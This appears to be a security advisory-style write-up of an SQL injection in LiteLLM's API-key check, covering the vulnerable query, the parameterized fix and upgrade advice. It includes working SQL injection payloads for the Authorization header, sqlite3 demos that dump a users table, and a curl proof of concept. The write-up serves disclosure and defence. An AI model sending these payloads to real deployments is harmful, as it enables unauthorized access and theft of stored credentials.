LiteLLM has become a popular open-source “AI Gateway” (GitHub: BerriAI/litellm), making it easier to run OpenAI-style LLM queries across models and providers. But from version 1.81.16 up to just before 1.83.7, a serious vulnerability, now tracked as CVE-2026-42208, put every deployment at risk.

In this long read, we’ll explain the issue in plain language, show how attackers can exploit it, provide code snippets, and discuss patching strategies.

The Bug Explained

When LiteLLM checks a provided “API key” (used to gate access to the LLM proxy), it looks things up in its configured database.

But from version 1.81.16 until 1.83.7, the proxy constructed its query text by mixing in the Authorization value directly, rather than using parameter placeholders.

This unsafe pattern looks like

# Vulnerable code pattern (before v1.83.7):
cursor.execute(f"SELECT * FROM api_keys WHERE key = '{api_key}'")

Because api_key is fully attacker-controlled and is never sanitized or parameterized, an attacker can inject arbitrary SQL.

This opens classic SQL Injection for any LiteLLM deployment using a SQL database (Postgres, SQLite, etc).
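The impact is easy to reproduce in isolation. Below is a self-contained sketch using Python’s built-in sqlite3 module; the api_keys table and its columns are illustrative stand-ins, not LiteLLM’s actual schema. It shows how the interpolated query happily authorizes a key that does not exist:

```python
import sqlite3

# Toy in-memory database standing in for the proxy's key store
# (schema is illustrative, not LiteLLM's actual one).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE api_keys (key TEXT, owner TEXT)")
conn.execute("INSERT INTO api_keys VALUES ('sk-real-key', 'alice')")

def check_key_vulnerable(api_key: str):
    # Mirrors the unsafe pattern: user input spliced into the SQL text.
    query = f"SELECT * FROM api_keys WHERE key = '{api_key}'"
    return conn.execute(query).fetchall()

# A legitimate lookup with a wrong key returns nothing...
assert check_key_vulnerable("wrong-key") == []

# ...but an injected tautology matches every row, bypassing the check.
rows = check_key_vulnerable("' OR 1=1 --")
print(rows)  # [('sk-real-key', 'alice')] — the real key is exposed
```

The payload turns the WHERE clause into `key = '' OR 1=1`, with the trailing `--` commenting out the leftover quote, so every row matches.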

How the Exploit Works

The API endpoints in LiteLLM take an Authorization header, which is supposed to be the API key.

If an attacker crafts a special value, the key-validation code in LiteLLM’s proxy passes this dangerous string directly to the SQL engine while checking the key.

Key attack facts

- Any LLM API endpoint (e.g., POST /chat/completions) can be targeted.

Suppose an attacker sends

Authorization: abc' OR 1=1; --

This turns the query into

SELECT * FROM api_keys WHERE key = 'abc' OR 1=1; --'

If the attacker guesses the database has a table named users

Authorization: ' UNION SELECT * FROM users; --

Provided the column counts line up with the original SELECT, this could dump user records, emails, and even credentials managed by the proxy.
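The UNION technique can also be demonstrated end to end with sqlite3. The tables and columns below are hypothetical (the attacker’s SELECT must return the same number of columns as the original query, two in this sketch):

```python
import sqlite3

# Illustrative schema: the attacker's UNION must return the same
# number of columns as the original SELECT (two here).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE api_keys (key TEXT, owner TEXT)")
conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice@example.com', 'hunter2')")

payload = "' UNION SELECT email, password FROM users --"
query = f"SELECT * FROM api_keys WHERE key = '{payload}'"
rows = conn.execute(query).fetchall()
print(rows)  # [('alice@example.com', 'hunter2')] — users table dumped
```

The key lookup itself matches nothing, but the UNIONed branch smuggles the contents of an unrelated table into the result set.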

Here’s a very basic PoC using curl

curl -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: ' OR 1=1; --" \
  http://<litellm-server>/chat/completions \
  -d '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"hello"}]}'

Instead of rejecting access, the server might respond as if you have valid credentials — or leak information in error messages or in the raw SQL responses, depending on deployment.

The dangerous code path can be summarized as

1. The API receives a request whose Authorization header is attacker-controlled.
2. LiteLLM interpolates the provided key directly into the SQL query string.
3. The injected payload alters the SQL the database actually executes.
4. On database error, error details may be echoed in the API response, giving the attacker feedback for refining the payload.
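The steps above can be sketched as a minimal vulnerable handler (sqlite3-based, with hypothetical names; this is an illustration of the pattern, not LiteLLM’s actual code). Note how a malformed payload surfaces the raw database error to the caller:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE api_keys (key TEXT)")

def handle_request(auth_header: str) -> dict:
    # Steps 1-2: take the Authorization value and splice it into SQL.
    query = f"SELECT * FROM api_keys WHERE key = '{auth_header}'"
    try:
        rows = conn.execute(query).fetchall()
        return {"authorized": bool(rows)}
    except sqlite3.Error as exc:
        # Step 4: the raw database error leaks into the API response,
        # handing the attacker feedback for refining the payload.
        return {"error": str(exc)}

# An unbalanced quote breaks the SQL, and the error is echoed back.
print(handle_request("'"))
```

In a hardened service, the response would be a generic 401/500; echoing driver errors converts blind injection into a much easier, feedback-driven attack.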

Code Before Patch

# Buggy: interpolates user input directly
api_key = get_authorization_header(request)
cursor.execute(f"SELECT * FROM api_keys WHERE key = '{api_key}'")

Code After Patch

# Fixed: uses parameterization, which blocks SQL injection
cursor.execute("SELECT * FROM api_keys WHERE key = ?", (api_key,))

Parameter binding is the correct way to prevent SQL injection and is supported by every modern database driver (placeholder syntax varies: `?` for sqlite3, `%s` for psycopg2, `$1` for asyncpg).
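A quick way to convince yourself the fix works (sqlite3 again, with the same illustrative schema): the payload that bypassed the interpolated query is treated as an ordinary string literal once it is bound as a parameter:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE api_keys (key TEXT)")
conn.execute("INSERT INTO api_keys VALUES ('sk-real-key')")

payload = "' OR 1=1 --"

# Parameter binding: the driver sends the payload as data, not SQL text,
# so the tautology never reaches the parser and no rows match.
rows = conn.execute(
    "SELECT * FROM api_keys WHERE key = ?", (payload,)
).fetchall()
print(rows)  # []
```

The query shape is fixed at prepare time; only the bound value changes, which is exactly what makes this defense robust.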

Patch and Remediation

This issue is fully patched in LiteLLM v1.83.7.
The patched version always uses parameterized SQL queries for checking API keys (and elsewhere).

Do not use LiteLLM 1.81.16 – 1.83.6 in production without patching!

- Upgrade to at least LiteLLM v1.83.7 (release notes)
- Assume your data might be breached — rotate any secrets (API keys, credentials) stored in your proxy’s database.
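As a quick triage aid, a deployment script can refuse to start on a vulnerable version. Here is a stdlib-only sketch with a deliberately naive parser (it assumes plain `X.Y.Z` versions with no suffixes; real deployments should use `packaging.version` instead):

```python
def parse(version: str) -> tuple:
    # Naive parser: assumes plain "X.Y.Z" with no pre-release suffixes.
    return tuple(int(part) for part in version.split("."))

def is_vulnerable(version: str) -> bool:
    # CVE-2026-42208 affects 1.81.16 (inclusive) up to 1.83.7 (exclusive).
    return parse("1.81.16") <= parse(version) < parse("1.83.7")

assert is_vulnerable("1.82.0")
assert is_vulnerable("1.83.6")
assert not is_vulnerable("1.83.7")
assert not is_vulnerable("1.81.15")
```

Tuple comparison handles the multi-digit components (16 vs. 7) correctly, which a plain string comparison would get wrong.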

References

- Official LiteLLM GitHub
- Security release patch 1.83.7
- CVE-2026-42208 at cve.org *(pending)*

Summary

CVE-2026-42208 was a “classic” but devastating SQL injection flaw in a next-gen AI gateway. Unauthenticated attackers could read or modify database content, steal secrets, or impersonate users simply by sending crafted Authorization headers.

If you deploy LiteLLM, upgrade immediately.
Never interpolate user input into SQL — always use parameterized queries!

> Stay secure, stay up to date.
> Discovered a similar bug? Report it responsibly through the project’s published security policy!


*This analysis is based exclusively on review of commit logs, documentation, and the CVE advisory. All PoCs are for educational use only. Protect your AI gateways!*

Timeline

Published on: 05/08/2026 03:38:14 UTC
Last modified on: 05/08/2026 04:16:19 UTC